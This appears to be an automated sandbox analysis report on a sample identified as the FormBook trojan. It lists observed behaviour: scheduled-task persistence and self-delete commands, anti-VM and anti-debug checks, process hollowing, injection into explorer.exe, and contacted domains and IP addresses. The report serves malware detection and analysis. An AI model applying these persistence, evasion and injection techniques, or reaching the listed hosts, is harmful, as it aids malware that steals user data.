Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Users\user\Desktop\ejecutable2.exe C:\Users\user\Desktop\ejecutable2.exe Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable2.exe' Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe File created: C:\Users\user\AppData\Local\Temp\tmp86AE.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/3@7/7
Source: C:\Users\user\Desktop\ejecutable2.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: ejecutable2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ejecutable2.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdb source: ejecutable2.exe, 00000004.00000002.487685735.00000000009D0000.00000040.00000001.sdmp, wscript.exe
Source: Binary string: wscript.pdb source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp
Source: Binary string: wscript.pdbN source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: ejecutable2.exe, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: CmsVPZkxbOtm.exe.0.dr, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.ejecutable2.exe.1120000.0.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.ejecutable2.exe.1120000.2.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.ejecutable2.exe.1120000.5.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_0033E345 push ss; retn 0033h 0_2_0033E34D
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_048C4649 push esp; ret 0_2_048C464A
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041B87C push eax; ret 4_2_0041B882
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041B812 push eax; ret 4_2_0041B818
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041B81B push eax; ret 4_2_0041B882
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00415B53 push ds; ret 4_2_00415B1C
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00415B1A push ds; ret 4_2_00415B1C
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00415CE2 push 81CAEFA2h; retf 4_2_00415CE9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239DFA1 push ecx; ret 6_2_0239DFB4
Source: initial sample Static PE information: section name: .text entropy: 6.99221568577

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\ejecutable2.exe File created: C:\Users\user\AppData\Roaming\CmsVPZkxbOtm.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp'

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\wscript.exe Process created: /c del 'C:\Users\user\Desktop\ejecutable2.exe'
Deletes itself after installation
Source: C:\Windows\SysWOW64\cmd.exe File deleted: c:\users\user\desktop\ejecutable2.exe
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 0.2.ejecutable2.exe.262ecec.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.424438137.000000000265F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ejecutable2.exe PID: 2548, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\ejecutable2.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ejecutable2.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 0000000000078604 second address: 000000000007860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 000000000007898E second address: 0000000000078994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\ejecutable2.exe TID: 2576 Thread sleep time: -31446s >= -30000s
Source: C:\Users\user\Desktop\ejecutable2.exe TID: 2652 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 2572 Thread sleep time: -40000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 2680 Thread sleep time: -34000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_004088C0 rdtsc 4_2_004088C0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\ejecutable2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ejecutable2.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\ejecutable2.exe Thread delayed: delay time: 31446
Source: C:\Users\user\Desktop\ejecutable2.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: ejecutable2.exe, 00000000.00000002.424014627.000000000059F000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000005.00000000.439477133.00000000044E7000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_004088C0 rdtsc 4_2_004088C0
Enables debug privileges
Source: C:\Users\user\Desktop\ejecutable2.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wscript.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A26F8 mov eax, dword ptr fs:[00000030h] 6_2_023A26F8
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\ejecutable2.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\wscript.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00409B30 LdrLoadDll, 4_2_00409B30
Source: C:\Users\user\Desktop\ejecutable2.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.branchwallet.com
Source: C:\Windows\explorer.exe Domain query: www.wwiilive.com
Source: C:\Windows\explorer.exe Network Connect: 5.101.152.161 80
Source: C:\Windows\explorer.exe Network Connect: 35.168.81.157 80
Source: C:\Windows\explorer.exe Network Connect: 3.223.115.185 80
Source: C:\Windows\explorer.exe Domain query: www.tunetel.com
Source: C:\Windows\explorer.exe Domain query: www.play-to-escape.com
Source: C:\Windows\explorer.exe Domain query: www.yhomggsmtdynchb.store
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.222 80
Source: C:\Windows\explorer.exe Domain query: www.iptechcm.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.pizza-mio.com
Source: C:\Windows\explorer.exe Network Connect: 195.77.116.8 80
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.77 80
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\ejecutable2.exe Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: AB0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\ejecutable2.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\ejecutable2.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\ejecutable2.exe Memory written: C:\Users\user\Desktop\ejecutable2.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\ejecutable2.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\ejecutable2.exe Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\wscript.exe Thread register set: target process: 1764
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp'
Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Users\user\Desktop\ejecutable2.exe C:\Users\user\Desktop\ejecutable2.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable2.exe'
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\ejecutable2.exe Queries volume information: C:\Users\user\Desktop\ejecutable2.exe VolumeInformation

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 4.2.ejecutable2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 4.2.ejecutable2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY